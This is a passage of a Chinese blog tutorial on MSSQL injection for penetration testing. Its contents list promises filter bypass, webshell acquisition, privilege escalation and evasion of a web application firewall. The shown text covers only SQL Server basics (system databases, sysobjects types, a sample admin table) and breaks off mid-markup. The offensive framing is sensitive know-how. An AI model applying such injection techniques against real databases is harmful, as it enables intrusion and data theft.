MSSQL注入的高级安全技术

释放双眼,带上耳机,听听看~!

本文主要讲到MSSQL在渗透中的注入绕过,提权思路,站库分离怎么做,其中很多知识其实都是用了很久的了,一方面为了迎合新的版本所以全套都使用的 2008 sql server,老版本的一些知识可能没有涉及到。

目录

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">基础</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">基本信息</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">基本语句</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">的符号</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">4.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">注入基本流程</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">5.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">报错注入简单绕过</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">6.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">盲注与联合注入</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">中级</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">备份与命令拿</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">shell</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">提权与站库分离</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> MSSQL bypass</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">安全狗</span></code></span></span></p></li>
   </ol><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><br></span></code></span></span></p>

第一章 MSSQL基本使用

0x00 简介

Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system,为了迎合新的版本我接下来的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给我们注入过程带来了便利,所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。

0x01 默认库的介绍

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">master </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//用于记录所有SQL Server系统级别的信息,这些信息用于控制用户数据库和数据操作。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">model </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//SQL Server为用户数据库提供的样板,新的用户数据库都以model数据库为基础</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">msdb </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//由 Enterprise Manager和Agent使用,记录着任务计划信息、事件处理信息、数据备份及恢复信息、警告及异常信息。</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">tempdb </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//它为临时表和其他临时工作提供了一个存储区。</span></code></span></span></p></li>
   </ol>

这里我们经常要打交道的库也就是master,他储存了我们的所有数据库名等等,还有很多储存过程,所谓储存过程你可以把他理解成一个函数调用的过程。

储存过程是一个可编程的函数,它在数据库中创建并保存。它可以有SQL语句和一些特殊的控制结构组成。当希望在不同的应用程序或平台上执行相同的函数,或者封装特定功能时,存储过程是非常有用的。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式。

我们以master库为例可以看到上面几个东西,其中视图表master.dbo.sysdatabases储存所有数据库名,其他数据库的视图则储存他本库的表名与列名。 每一个库的试图表都有syscolumns存储着所有的字段,可编程性储存着我们的函数。

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">dbo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysdatabases</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">master</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">tempdb</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">model</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">msdb</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">test</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">asp_net</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">asp_test</span></code></span></span></p></li>
   </ol>

mssql的储存过程是我们利用的重点,他天然支持多语句,也为我们注入提供了便利,我们可以通过查看可编程性里面的函数来查找他的功能,发现一些新的东西

0x02 字段的介绍

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xtype </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">name xtype</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysrscols S </span></code></span></span></p></li>
   </ol>

xtype可以是下列对象类型中的一种: C = CHECK 约束  D = 默认值或 DEFAULT 约束  F = FOREIGN KEY 约束  L = 日志  FN = 标量函数 IF = 内嵌表函数   P = 存储过程   PK = PRIMARY KEY 约束(类型是 K)   RF = 复制筛选存储过程 S = 系统表   TF = 表函数   TR = 触发器   U = 用户表   UQ = UNIQUE 约束(类型是 K) V = 视图   X = 扩展存储过程

0x03 创建数据库

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">use</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> asp_net</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">create table admin </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">id </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> primary key </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">username varchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">50</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">password varchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">50</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">insert </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">into</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">id</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">username</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">password</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> values</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span><span 